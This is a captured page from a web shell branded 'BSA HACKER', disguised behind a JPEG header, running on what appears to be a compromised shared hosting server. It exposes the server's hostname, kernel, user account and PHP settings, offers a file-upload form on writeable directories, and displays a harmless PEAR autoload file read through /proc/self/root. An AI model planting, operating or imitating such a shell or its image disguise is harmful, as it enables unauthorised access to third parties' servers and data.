ÿØÿàJFIFHHÿá .
BSA HACKER
Logo of a company Server : Apache
System : Linux nusantara.hosteko.com 4.18.0-553.16.1.lve.el8.x86_64 #1 SMP Tue Aug 13 17:45:03 UTC 2024 x86_64
User : koperas1 ( 1254)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /proc/self/root/opt/alt/php53/usr/share/pear/PHP_CodeBrowser/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/self/root/opt/alt/php53/usr/share/pear/PHP_CodeBrowser/Autoload.php
<?php // this is an autogenerated file - do not edit (created Mon, 05 Sep 2011 09:22:14 +0200)
function autoload4e6478a62c1e5($class) {
      static $classes = null;
      if ($classes === null) {
         $classes = array(
            'cbclicontroller' => '/CLIController.php',
            'cberrorcheckstyle' => '/Plugins/ErrorCheckstyle.php',
            'cberrorcoverage' => '/Plugins/ErrorCoverage.php',
            'cberrorcpd' => '/Plugins/ErrorCPD.php',
            'cberrorcrap' => '/Plugins/ErrorCRAP.php',
            'cberrorpadawan' => '/Plugins/ErrorPadawan.php',
            'cberrorpmd' => '/Plugins/ErrorPMD.php',
            'cbfile' => '/File.php',
            'cbiohelper' => '/Helper/IOHelper.php',
            'cbissue' => '/Issue.php',
            'cbissuexml' => '/IssueXml.php',
            'cbpluginsabstract' => '/PluginsAbstract.php',
            'cbsourcehandler' => '/SourceHandler.php',
            'cbviewabstract' => '/View/ViewAbstract.php',
            'cbviewreview' => '/View/ViewReview.php'
         );
      }
   $cn = strtolower($class);
   if (isset($classes[$cn])) {
      require dirname(__FILE__) . $classes[$cn];
   }
}
spl_autoload_register('autoload4e6478a62c1e5');